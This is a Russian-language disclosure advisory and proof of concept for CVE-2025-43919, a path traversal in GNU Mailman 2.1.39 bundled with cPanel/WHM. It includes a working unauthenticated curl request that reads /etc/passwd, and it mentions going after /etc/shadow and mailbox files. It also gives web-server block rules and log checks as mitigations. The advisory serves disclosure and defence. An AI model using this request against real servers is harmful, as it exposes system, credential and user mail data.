
Доказательство концепции для CVE-2025-43919: обход каталога в GNU Mailman 2.1.39 (cPanel/WHM). Использует неаутентифицированные POST-запросы для чтения произвольных серверных файлов, включая /etc/passwd и данные конфигурации.
Обнаружено: Фирдудин Давудзада и Мусазада Айдан
Дата раскрытия: Апрель 2025
ID CVE: CVE-2025-43919
Серьёзность: 5.8 Средний (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)
Тип атаки: Удалённая
Затронутое ПО: GNU Mailman 2.1.39 (в составе cPanel/WHM)
GNU Mailman 2.1.39, поставляемый в составе cPanel и WHM, содержит критическую уязвимость directory traversal в конечной точке /mailman/private/mailman. Неаутентифицированные злоумышленники могут использовать эту ошибку для чтения произвольных файлов на сервере, таких как /etc/passwd или файлы конфигурации Mailman, из-за недостаточной проверки входных данных в CGI-скрипте private.py. Эта уязвимость представляет значительные риски раскрытия информации и может способствовать дальнейшим атакам в сочетании с другими эксплойтами.
private.py (обрабатывает аутентификацию для частных архивов)archive.py (логика обработки архивов)Mailman/Handlers/ (основная логика списков рассылки).mboxusername в POST-запросах к /mailman/private/mailman не санируется, что позволяет использовать последовательности ../ для обхода файловой системы.Следующая команда демонстрирует несанкционированный доступ к /etc/passwd:
curl -X POST -d "username=../../../../etc/passwd&password=x&submit=Let+me+in..." http://target/mailman/private/mailman
Ожидаемый вывод: Содержимое /etc/passwd или других целевых файлов, в зависимости от прав доступа на сервере.
/mailman/private/mailman с подставленным параметром username, содержащим .././etc/passwd, /etc/shadow, если позволяют разрешения)..mbox для извлечения данных пользователей или содержимого писем.Ограничить доступ к конечной точке: Настройте веб-сервер на блокировку несанкционированного доступа к /mailman/private:
<Location "/mailman/private">
Require ip 127.0.0.1
Deny from all
</Location>
Или для Nginx:
location /mailman/private {
deny all;
return 403;
}
Мониторинг логов: Проверьте журналы на наличие подозрительных POST-запросов к /mailman/private/mailman:
tail -f /var/log/httpd/access_log | grep "/mailman/private"
Фирдудин Давудзада и Мусазада Айдан ответственно раскрыли эту уязвимость в ходе санкционированного тестирования на проникновение. Спасибо команде MITRE CVE за координацию.
Эл. почта: [email protected]